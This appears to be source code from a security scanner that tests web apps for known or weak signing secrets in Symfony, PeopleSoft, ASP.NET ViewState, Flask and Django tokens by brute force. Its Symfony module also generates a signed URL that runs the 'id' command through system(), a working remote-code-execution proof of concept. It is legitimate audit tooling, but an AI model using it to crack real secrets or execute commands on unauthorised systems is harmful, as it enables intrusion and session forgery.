import re
import hmac
import base64


from badsecrets.base import BadsecretsBase

# Special thanks to Ambionics Security for their blog post: https://www.ambionics.io/blog/symfony-secret-fragment


class Symfony_SignedURL(BadsecretsBase):
    identify_regex = re.compile(r"http(?:s)?:\/\/[^\/]+\/_fragment[^\s]+_hash=[\/a-zA-z-0-9\+=%]{24,132}")
    description = {"Product": "Symfony Signed URL", "Secret": "Symfony APP_SECRET"}

    def carve_regex(self):
        return re.compile(r"(http(?:s)?:\/\/[^\/]+\/_fragment[^\s]+_hash=[\/a-zA-z-0-9\+=%]{24,132})")

    def symfonyHMAC(self, url, secret, hash_algorithm):
        return base64.b64encode(hmac.HMAC(secret.encode(), url.encode(), hash_algorithm).digest())

    def symfonyPoC(self, secret, url, hash_algorithm):
        host = url.split("_fragment")[0]
        poc_string = "_fragment?_path=_controller%3Dsystem%26command%3Did%26return_value%3Dnull"
        full_url = f"{host}{poc_string}"
        poc_hash = self.symfonyHMAC(full_url, secret, hash_algorithm)
        poc_url = f"{full_url}&_hash={poc_hash.decode()}"
        return poc_url

    def symfonyVerify(self, value, secret):
        url, url_hash = value.split("&_hash=")
        for hash_algorithm_str in self.search_dict(self.hash_sizes, len(base64.b64decode(url_hash))):
            hash_algorithm = self.hash_algs[hash_algorithm_str]
            generated_hash = self.symfonyHMAC(url, secret, hash_algorithm)
            if generated_hash == url_hash.encode():
                return {
                    "hash algorithm": hash_algorithm.__name__.split("openssl_")[1],
                    "PoC URL (executes 'id')": self.symfonyPoC(secret, url, hash_algorithm),
                }
        return False

    def check_secret(self, signed_url):
        if not self.identify(signed_url):
            return None
        for l in self.load_resource("symfony_appsecret.txt"):
            password = l.rstrip()
            r = self.symfonyVerify(value=signed_url, secret=password)
            if r:
                return {"secret": password, "details": r}
        return None



import zlib
import base64
import hashlib
from badsecrets.base import BadsecretsBase, generic_base64_regex


class Peoplesoft_PSToken(BadsecretsBase):
    identify_regex = generic_base64_regex
    description = {"Product": "Peoplesoft PS_TOKEN", "Secret": "Peoplesoft Secret"}

    def check_secret(self, PS_TOKEN_B64):
        if not self.identify(PS_TOKEN_B64):
            return None
        PS_TOKEN = base64.b64decode(PS_TOKEN_B64)
        SHA1_mac = PS_TOKEN[44:64]
        try:
            PS_TOKEN_DATA = zlib.decompress(PS_TOKEN[76:])
        except zlib.error:
            return None

        username = PS_TOKEN_DATA[21 : 21 + PS_TOKEN_DATA[20]].replace(b"\x00", b"").decode()

        # try no password
        h = hashlib.sha1(PS_TOKEN_DATA)
        if h.digest() == SHA1_mac:
            return {"secret": f"Username: {username} Password: BLANK PASSWORD!", "details": None}

        for l in set(
            list(self.load_resource("peoplesoft_passwords.txt")) + list(self.load_resource("top_10000_passwords.txt"))
        ):
            password = l.strip()

            h = hashlib.sha1(PS_TOKEN_DATA + password.encode("utf_16_le", errors="ignore"))
            if h.digest() == SHA1_mac:
                return {"secret": f"Username: {username} Password: {password}", "details": None}

        return None



import re
import hmac
import struct
import base64
import hashlib
import binascii
from Crypto.Cipher import AES
from Crypto.Cipher import DES
from Crypto.Cipher import DES3
from viewstate import ViewState
from contextlib import suppress
from badsecrets.helpers import unpad
from viewstate.exceptions import ViewStateException
from badsecrets.base import BadsecretsBase, generic_base64_regex


class ASPNET_Viewstate(BadsecretsBase):
    check_secret_args = 2

    identify_regex = generic_base64_regex
    description = {"Product": "ASP.NET Viewstate", "Secret": "ASP.NET MachineKey"}

    def carve_regex(self):
        return re.compile(
            r"<input.+__VIEWSTATE\"\svalue=\"(.+)\"[\S\s]+<input.+__VIEWSTATEGENERATOR\"\svalue=\"(\w+)\""
        )

    def carve_to_check_secret(self, s):
        if len(s.groups()) == 2:
            r = self.check_secret(s.groups()[0], generator=s.groups()[1])
            return r

    @staticmethod
    def valid_preamble(sourcebytes):
        if sourcebytes[0:2] == b"\xff\x01":
            return True
        return False

    def viewstate_decrypt(self, ekey_bytes, hash_alg, viewstate_B64):
        viewstate_bytes = base64.b64decode(viewstate_B64)

        vs_size = len(viewstate_bytes)
        dec_algos = set()
        hash_size = self.hash_sizes[hash_alg]

        if (vs_size - hash_size) % AES.block_size == 0:
            dec_algos.add("AES")
        if (vs_size - hash_size) % DES.block_size == 0:
            dec_algos.add("DES")
            dec_algos.add("3DES")
        for dec_algo in list(dec_algos):
            with suppress(ValueError):
                if dec_algo == "AES":
                    block_size = AES.block_size
                    iv = viewstate_bytes[0:block_size]
                    cipher = AES.new(ekey_bytes, AES.MODE_CBC, iv)
                    blockpadlen_raw = len(ekey_bytes) % AES.block_size
                    if blockpadlen_raw == 0:
                        blockpadlen = block_size
                    else:
                        blockpadlen = blockpadlen_raw

                elif dec_algo == "3DES":
                    block_size = DES3.block_size
                    iv = viewstate_bytes[0:block_size]
                    cipher = DES3.new(ekey_bytes[:24], DES3.MODE_CBC, iv)
                    blockpadlen = 16

                elif dec_algo == "DES":
                    block_size = DES.block_size
                    iv = viewstate_bytes[0:block_size]
                    cipher = DES.new(ekey_bytes[:8], DES.MODE_CBC, iv)
                    blockpadlen = 0

            encrypted_raw = viewstate_bytes[block_size:-hash_size]
            decrypted_raw = cipher.decrypt(encrypted_raw)

            with suppress(TypeError):
                decrypt = unpad(decrypted_raw[blockpadlen:])

                if self.valid_preamble(decrypt):
                    return dec_algo
                else:
                    continue

    def viewstate_validate(self, vkey, encrypted, viewstate_B64, generator):
        viewstate_bytes = base64.b64decode(viewstate_B64)

        if encrypted:
            candidate_hash_algs = list(self.hash_sizes.keys())

        else:
            vs = ViewState(viewstate_B64)
            try:
                vs.decode()
            except ViewStateException:
                return None
            signature_len = len(vs.signature)
            candidate_hash_algs = self.search_dict(self.hash_sizes, signature_len)

        for hash_alg in candidate_hash_algs:
            viewstate_data = viewstate_bytes[: -self.hash_sizes[hash_alg]]
            signature = viewstate_bytes[-self.hash_sizes[hash_alg] :]
            if hash_alg == "MD5":
                try:
                    md5_bytes = viewstate_data + binascii.unhexlify(vkey)
                    if not encrypted:
                        md5_bytes += b"\x00" * 4
                    h = hashlib.md5(md5_bytes)
                except binascii.Error:
                    continue
            else:
                try:
                    vs_data_bytes = viewstate_data
                    if not encrypted:
                        vs_data_bytes += generator
                    h = hmac.new(
                        binascii.unhexlify(vkey),
                        vs_data_bytes,
                        self.hash_algs[hash_alg],
                    )
                except binascii.Error:
                    continue

            if h.digest() == signature:
                return hash_alg

        return None

    def check_secret(self, viewstate_B64, generator="0000"):
        if not self.identify(viewstate_B64):
            return None

        generator = struct.pack("<I", int(generator, 16))
        if self.valid_preamble(base64.b64decode(viewstate_B64)):
            encrypted = False
        else:
            encrypted = True

        for l in self.load_resource("aspnet_machinekeys.txt"):
            try:
                vkey, ekey = l.rstrip().split(",")
            except ValueError:
                continue
            validationAlgo = self.viewstate_validate(vkey, encrypted, viewstate_B64, generator)
            if validationAlgo:
                confirmed_ekey = None
                decryptionAlgo = None
                if encrypted:
                    with suppress(binascii.Error):
                        ekey_bytes = binascii.unhexlify(ekey)
                        decryptionAlgo = self.viewstate_decrypt(ekey_bytes, validationAlgo, viewstate_B64)
                        if decryptionAlgo:
                            confirmed_ekey = ekey

                result = f"validationKey: {vkey} validationAlgo: {validationAlgo}"
                if confirmed_ekey:
                    result += f" encryptionKey: {confirmed_ekey} encryptionAlgo: {decryptionAlgo}"
                return {"secret": result, "details": None}
        return None



# flask_secret_keys wordlist shamelessly copied from https://github.com/Paradoxis/Flask-Unsign <3 <3 <3

import re
from flask_unsign import verify as flaskVerify
from badsecrets.base import BadsecretsBase


class Flask_SignedCookies(BadsecretsBase):
    identify_regex = re.compile(r"eyJ(?:[\w-]*\.)(?:[\w-]*\.)[\w-]*")
    description = {"Product": "Flask Signed Cookie", "Secret": "Flask Password"}

    def check_secret(self, flask_cookie):
        if not self.identify(flask_cookie):
            return None
        for l in set(
            list(self.load_resource("flask_secret_keys.txt")) + list(self.load_resource("top_10000_passwords.txt"))
        ):
            password = l.rstrip()
            r = flaskVerify(value=flask_cookie, secret=password)
            if r:
                return {"secret": password, "details": r}
        return None



import re
import os
import hashlib
import requests
import badsecrets.errors
from abc import abstractmethod

generic_base64_regex = re.compile(
    r"^(?:[A-Za-z0-9+\/]{4}){8,}(?:[A-Za-z0-9+\/]{4}|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{2}={2})$"
)


class BadsecretsBase:
    identify_regex = re.compile(r".+")
    description = {"Product": "Undefined", "Secret": "Undefined"}

    hash_sizes = {"SHA1": 20, "MD5": 16, "SHA256": 32, "SHA384": 48, "SHA512": 64}
    hash_algs = {
        "SHA1": hashlib.sha1,
        "MD5": hashlib.md5,
        "SHA256": hashlib.sha256,
        "SHA384": hashlib.sha384,
        "SHA512": hashlib.sha512,
        "AES": hashlib.sha1,
        "3DES": hashlib.sha1,
    }

    check_secret_args = 1

    def __init__(self, **kwargs):
        setattr(self, "custom_resource", kwargs.get("custom_resource", None))

        if self.custom_resource:
            if not os.path.exists(self.custom_resource):
                raise badsecrets.errors.LoadResourceException(
                    f"Custom resource [{self.custom_resource}] does not exist"
                )

    @abstractmethod
    def check_secret(self, secret):
        raise NotImplementedError

    @classmethod
    def get_description(self):
        return self.description

    def load_resource(self, resource):
        if self.custom_resource:
            filepath = self.custom_resource
        else:
            filepath = f"{os.path.dirname(os.path.abspath(__file__))}/resources/{resource}"
        with open(filepath) as r:
            for l in r.readlines():
                if len(l) > 0:
                    yield l

    def carve_to_check_secret(self, s):
        if s.groups():
            r = self.check_secret(s.groups()[0])
            return r

    @abstractmethod
    def carve_regex(self):
        return None

    def carve(self, body=None, cookies=None, requests_response=None):
        results = []

        if not body and not cookies and requests_response == None:
            raise badsecrets.errors.CarveException("Either body/cookies or requests_response required")

        if requests_response != None:
            if body or cookies:
                raise badsecrets.errors.CarveException("Body/cookies and requests_response cannot both be set")

            if type(requests_response) == requests.models.Response:
                body = requests_response.text
                cookies = dict(requests_response.cookies)
            else:
                raise badsecrets.errors.CarveException("requests_response must be a requests.models.Response object")

        if cookies:
            if type(cookies) != dict:
                raise badsecrets.errors.CarveException("Header argument must be type dict")
            for k, v in cookies.items():
                r = self.check_secret(v)
                if r:
                    r["type"] = "SecretFound"
                    r["source"] = v
                    results.append(r)
        if body:
            if type(body) != str:
                raise badsecrets.errors.CarveException("Body argument must be type str")
            if self.carve_regex():
                s = re.search(self.carve_regex(), body)
                if s:
                    r = self.carve_to_check_secret(s)
                    if r:
                        r["type"] = "SecretFound"
                    else:
                        r = {"type": "IdentifyOnly"}
                    r["source"] = s.groups()[0]
                    results.append(r)

        for r in results:
            r["description"] = self.get_description()
        return results

    @classmethod
    def identify(self, secret):
        if re.match(self.identify_regex, secret):
            return True
        return False

    @staticmethod
    def search_dict(d, query):
        items = [key for key, value in d.items() if query == value]
        if items:
            return items


def check_all_modules(*args):
    for m in BadsecretsBase.__subclasses__():
        x = m()
        r = x.check_secret(*args[0 : x.check_secret_args])
        if r:
            r["detecting_module"] = m.__name__
            return r
    return None


def carve_all_modules(**kwargs):
    results = []
    for m in BadsecretsBase.__subclasses__():
        x = m()
        r_list = x.carve(**kwargs)
        if len(r_list) > 0:
            for r in r_list:
                r["detecting_module"] = m.__name__
                results.append(r)
    if results:
        return results



import re
from django.core.signing import loads as djangoLoads, BadSignature
from badsecrets.base import BadsecretsBase


class DjangoSignedCookies(BadsecretsBase):
    identify_regex = re.compile(r"^[\.a-zA-z-0-9]+:[\.a-zA-z-0-9:]+$")
    description = {"Product": "Djangno Signed Cookie", "Secret": "Django secret_key"}

    def check_secret(self, django_signed_cookie):
        if not self.identify(django_signed_cookie):
            return False
        for l in set(
            list(self.load_resource("django_secret_keys.txt")) + list(self.load_resource("top_10000_passwords.txt"))
        ):
            secret_key = l.rstrip()
            try:
                r = djangoLoads(
                    django_signed_cookie,
                    key=secret_key,
                    fallback_keys="",
                    salt="django.contrib.sessions.backends.signed_cookies",
                )
            except BadSignature:
                continue
            if r:
                return {"secret": secret_key, "details": r}
